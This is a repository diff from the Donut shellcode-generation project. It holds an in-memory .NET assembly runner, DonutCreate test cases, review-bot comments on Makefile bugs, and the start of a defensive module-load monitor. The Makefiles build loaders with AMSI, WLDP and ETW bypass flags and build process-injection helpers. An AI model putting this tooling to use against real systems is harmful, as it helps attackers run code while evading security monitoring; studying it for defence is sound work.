10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <oleauto.h>
33 #include <mscoree.h>
34 #include <comdef.h>
35
36 #include <cstdio>
37 #include <cstdint>
38 #include <cstring>
39 #include <cstdlib>
40 #include <sys/stat.h>
41
42 #pragma comment(lib, "mscoree.lib")
43 #import "mscorlib.tlb" raw_interfaces_only
44
45 void rundotnet(void *code, size_t len) {
46 HRESULT hr;
47 ICorRuntimeHost *icrh;
48 IUnknownPtr iu;
49 mscorlib::_AppDomainPtr ad;
50 mscorlib::_AssemblyPtr as;
51 mscorlib::_MethodInfoPtr mi;
52 VARIANT v1, v2;
53 SAFEARRAY *sa;
54 SAFEARRAYBOUND sab;
55
56 printf("CorBindToRuntime(ICorRuntimeHost).\n");
57 hr = CorBindToRuntime(
58 NULL, // load latest runtime version available
59 NULL, // load workstation build
60 CLSID_CorRuntimeHost,
61 IID_ICorRuntimeHost,
62 (LPVOID*)&icrh);
63
64 if(FAILED(hr)) return;
65
66 printf("ICorRuntimeHost::Start()\n");
67 hr = icrh->Start();
68 if(SUCCEEDED(hr)) {
69 printf("ICorRuntimeHost::GetDefaultDomain()\n");
70 hr = icrh->GetDefaultDomain(&iu);
71 if(SUCCEEDED(hr)) {
72 printf("IUnknown::QueryInterface()\n");
73 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
74 if(SUCCEEDED(hr)) {
75 sab.lLbound = 0;
76 sab.cElements = len;
77 printf("SafeArrayCreate()\n");
78 sa = SafeArrayCreate(VT_UI1, 1, &sab);
79 if(sa != NULL) {
80 CopyMemory(sa->pvData, code, len);
81 printf("AppDomain::Load_3()\n");
82 hr = ad->Load_3(sa, &as);
83 if(SUCCEEDED(hr)) {
84 printf("Assembly::get_EntryPoint()\n");
85 hr = as->get_EntryPoint(&mi);
86 if(SUCCEEDED(hr)) {
87 v1.vt = VT_NULL;
88 v1.plVal = NULL;
89 printf("MethodInfo::Invoke_3()\n");
90 hr = mi->Invoke_3(v1, NULL, &v2);
91 mi->Release();
92 }
93 as->Release();
94 }
95 SafeArrayDestroy(sa);
96 }
97 ad->Release();
98 }
99 iu->Release();
100 }
101 icrh->Stop();
102 }
103 icrh->Release();
104 }
105
106 int main(int argc, char *argv[])
107 {
108 void *mem;
109 struct stat fs;
110 FILE *fd;
111
112 if(argc != 2) {
113 printf("usage: rundotnet <.NET assembly>\n");
114 return 0;
115 }
116
117 // 1. get the size of file
118 stat(argv[1], &fs);
119
120 if(fs.st_size == 0) {
121 printf("file is empty.\n");
122 return 0;
123 }
124
125 // 2. try open assembly
126 fd = fopen(argv[1], "rb");
127 if(fd == NULL) {
128 printf("unable to open \"%s\".\n", argv[1]);
129 return 0;
130 }
131 // 3. allocate memory
132 mem = malloc(fs.st_size);
133 if(mem != NULL) {
134 // 4. read file into memory
135 fread(mem, 1, fs.st_size, fd);
136 // 5. run the program from memory
137 rundotnet(mem, fs.st_size);
138 // 6. free memory
139 free(mem);
140 }
141 // 7. close assembly
142 fclose(fd);
143
144 return 0;
145 }
Binary diff not shown
+0
-88
DonutTest/testcase.c less more
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
86 return 0;
87 }
22 include LICENSE
33 include version-release-notes.txt
44 recursive-include . *.c
5 recursive-include payload *
5 recursive-include loader *
66 recursive-include include *
77 recursive-include docs *
8 recursive-include lib *
8 recursive-include lib *
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
0 donut: clean
1 gcc -Wunused-function -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c -odonut lib/aplib64.a
2 gcc -Wunused-function -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c format.c loader/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a
5 debug: clean
6 gcc -Wunused-function -ggdb -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.a -odonut
7 hash:
8 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include hash.c loader/clib.c -ohash
9 encrypt:
10 gcc -Wall -Wno-format -fpack-struct=8 -DTEST -I include encrypt.c loader/clib.c -oencrypt
711 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
12 rm -f loader.exe exe2h.exe exe2h loader32.exe loader64.exe donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so inject32.exe inject64.exe inject_local32.exe inject_local64.exe
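Review bot: The new `ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o lib/aplib64.a` line stores the aPLib archive inside libdonut.a as a single opaque member. `ar` does not merge archives, so a program that links only `libdonut.a` will most likely fail with undefined aPLib symbols. Either keep the archive to the project's own objects, `ar rcs lib/libdonut.a donut.o hash.o encrypt.o format.o clib.o`, and document that consumers also link `lib/aplib64.a`, or unpack the aPLib objects before archiving. Separately, `donut: clean` and `debug: clean` turn every build into a full rebuild; a `.PHONY: clean debug hash encrypt` line would make that intent explicit.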
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
0 CC32 := i686-w64-mingw32-gcc
1 CC64 := x86_64-w64-mingw32-gcc
2
3 donut: clean
4 $(info ###### RELEASE ######)
5 gcc -I include loader/exe2h/exe2h.c -oexe2h
6 $(CC64) -I include loader/exe2h/exe2h.c loader/exe2h/mmap-windows.c -lshlwapi -oexe2h.exe
7
8 $(CC32) -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel hash.c encrypt.c -I include -oloader.exe
9 ./exe2h loader.exe
10
11 $(CC64) -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel hash.c encrypt.c -I include -oloader.exe
12 ./exe2h loader.exe
13
14 $(CC64) -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
15
16 $(CC64) -Wall loader/inject.c -oinject32.exe
17 $(CC32) -Wall loader/inject.c -oinject64.exe
18 debug: clean
19 $(info ###### DEBUG ######)
20 $(CC32) -DCLIB -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel -oloader32.exe -lole32 -lshlwapi
21 $(CC64) -DCLIB -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c -masm=intel -oloader64.exe -lole32 -lshlwapi
22 $(CC64) -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c loader/syscalls.c -masm=intel lib/aplib64.lib -odonut.exe
23 $(CC32) -Wall loader/inject_local.c -oinject_local32.exe
24 $(CC64) -Wall loader/inject_local.c -oinject_local64.exe
25 $(CC64) -Wall loader/inject.c -oinject32.exe
26 $(CC32) -Wall loader/inject.c -oinject64.exe
427 clean:
5 rm donut.exe *.o
28 rm -f exe2h exe2h.exe loader.bin instance donut.o hash.o encrypt.o format.o clib.o syscalls.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so loader.exe loader32.exe loader64.exe inject32.exe inject64.exe
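Review bot: The inject helpers are built with the wrong cross-compilers in both the `donut` and `debug` rules: `$(CC64)` produces `inject32.exe` and `$(CC32)` produces `inject64.exe`, while the `inject_local` lines pair compiler and name correctly. The lines should be swapped to `$(CC32) -Wall loader/inject.c -oinject32.exe` and `$(CC64) -Wall loader/inject.c -oinject64.exe` so the bitness in the file name matches the binary. The new `clean` rule also leaves behind `inject_local32.exe` and `inject_local64.exe`, which the `debug` rule builds; adding them to the `rm -f` list keeps stale test binaries out of later builds.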
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
0 donut: clean
1 @echo ###### Building exe2h ######
2 ML64 /c loader/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64
3
4 cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
5
6 @echo ###### Building loader ######
7 cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c loader/syscalls.c
8 link -nologo -order:@loader\order.txt -entry:DonutLoader -fixed -subsystem:console -nodefaultlib loader.obj hash.obj encrypt.obj depack.obj clib.obj syscalls.obj syscalls-asm.obj
9 exe2h loader.exe
10
11 @echo ###### Building generator ######
12 rc include/donut.rc
13 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib include/donut.res
14 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
15 move donut.lib lib\donut.lib
16 move donut.exp lib\donut.exp
17 move donut.dll lib\donut.dll
18 debug: clean
19 ML64 /c loader/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64
20 cl /nologo -DDEBUG -DBYPASS_AMSI_B -DBYPASS_WLDP_A -DBYPASS_ETW_B -Zp8 -c -nologo -Gy -Os -EHa -GS- -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c loader/syscalls.c
21 link -nologo -order:@loader\order.txt -subsystem:console loader.obj hash.obj encrypt.obj depack.obj clib.obj syscalls.obj syscalls-asm.obj
22
23 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
24 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
25 move donut.lib lib\donut.lib
26 move donut.exp lib\donut.exp
27 move donut.dll lib\donut.dll
28 hash:
29 cl -Zp8 -nologo -DTEST -I include hash.c loader\clib.c
30 encrypt:
31 cl -Zp8 -nologo -DTEST -I include encrypt.c
1232 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
33 @del /Q mmap-windows.obj donut.obj hash.obj encrypt.obj depack.obj format.obj clib.obj exe2h.obj exe2h.exe loader.obj loader.exe hash.exe encrypt.exe donut.exe lib\libdonut.lib lib\libdonut.dll syscalls.obj syscalls-asm.obj inject32.exe inject64.exe
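Review bot: The rewritten `clean` rule deletes `lib\libdonut.lib` and `lib\libdonut.dll`, but the `donut` and `debug` rules in this file move their outputs to `lib\donut.lib`, `lib\donut.exp` and `lib\donut.dll`. The old rule removed those three names; the new one does not, so a clean build can leave library artifacts from a previous (possibly debug) build in `lib\`. Adding `lib\donut.lib lib\donut.exp lib\donut.dll` to the `@del /Q` list would fix this. `include/donut.res` from the `rc` step is also not removed, as far as the visible rule shows.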
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ModuleMonitor</RootNamespace>
9 <AssemblyName>ModuleMonitor</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <Deterministic>true</Deterministic>
13 <TargetFrameworkProfile />
14 </PropertyGroup>
15 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 <PlatformTarget>AnyCPU</PlatformTarget>
17 <DebugSymbols>true</DebugSymbols>
18 <DebugType>full</DebugType>
19 <Optimize>false</Optimize>
20 <OutputPath>bin\Debug\</OutputPath>
21 <DefineConstants>DEBUG;TRACE</DefineConstants>
22 <ErrorReport>prompt</ErrorReport>
23 <WarningLevel>4</WarningLevel>
24 <Prefer32Bit>false</Prefer32Bit>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <PropertyGroup>
37 <ApplicationManifest>app.manifest</ApplicationManifest>
38 </PropertyGroup>
39 <ItemGroup>
40 <Reference Include="System" />
41 <Reference Include="System.Core" />
42 <Reference Include="System.Management" />
43 <Reference Include="System.Xml.Linq" />
44 <Reference Include="System.Data.DataSetExtensions" />
45 <Reference Include="System.Data" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="app.config" />
54 <None Include="app.manifest" />
55 </ItemGroup>
56 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 </Project>
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
3 <StartArguments>--clr-sentry</StartArguments>
4 </PropertyGroup>
5 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
23 EndGlobalSection
24 EndGlobal
0 /* Name: ModuleMonitor
1 *
2 *
3 *
4 *
5 *
6 *
7 */
8
9 using System;
10 using System.Linq;
11 using System.Collections.Generic;
12 using System.Diagnostics;
13 using System.Management;
14 using System.Runtime.InteropServices;
15 using System.Security.Principal;
16
17 namespace CLRSentry
18 {
19 class Program
20 {
21 //TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
22 static void Main(string[] args)
23 {
24 if (args.Contains("-h") || args.Contains("--help"))
25 {
26 PrintUsage();
27
28 Environment.Exit(0);
29 }
30
31
32 if (args.Contains("--clr-sentry"))
33 {
34 CLRSentry();
35 }
36 else
37 {
38
39 MonitorModuleLoads();
40
41 }
42 }
43
44 /// <summary>
45 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
46 /// </summary>
47 public static void MonitorModuleLoads()
48 {
49 //Monitor without any filters
50 MonitorModuleLoads(new List<string>());
51 }
52
53 /// <summary>
54 /// Struct representing the WMI class Win32_ModuleLoadTrace
55 /// </summary>
56 [StructLayout(LayoutKind.Sequential)]
57 public struct Win32_ModuleLoadTrace
58 {
59 public sbyte[] SECURITY_DESCRIPTOR;
60 public UInt64 TIME_CREATED;
61 public string FileName;
62 public UInt64 DefaultBase;
63 public UInt64 ImageBase;
64 public UInt32 ImageChecksum;
65 public UInt64 ImageSize;
66 public UInt32 ProcessID;
67 public UInt32 TimeDateSTamp;
68 }
69
70
71 /// <summary>
72 /// Overload of GetNextModuleLoad that does not require filters.
73 /// </summary>
74 /// <returns></returns>
75 public static Win32_ModuleLoadTrace GetNextModuleLoad()
76 {
77 return GetNextModuleLoad(new List<string>());
78 }
79
80
81 /// <summary>
82 /// Get the details of the next module load
83 /// </summary>
84 /// <param name="filters">Filenames to filter for.</param>
85 /// <returns></returns>
86 public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
87 {
88 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
89
90 //Ideally, we would filter here to reduce the amount of events that we have to consume.
91 //However, we cannot use the WHERE clause because the
92 var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
93
94 ManagementBaseObject e = startWatch.WaitForNextEvent();
95
96 //Instead, we filter here, because it's easy and we're a bit lazy
97 if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
98 {
99 if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
100 trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
101
102 if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
103 trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
104
105 if (((ManagementBaseObject)e)["FileName"] != null)
106 trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
107
108 if (((ManagementBaseObject)e)["DefaultBase"] != null)
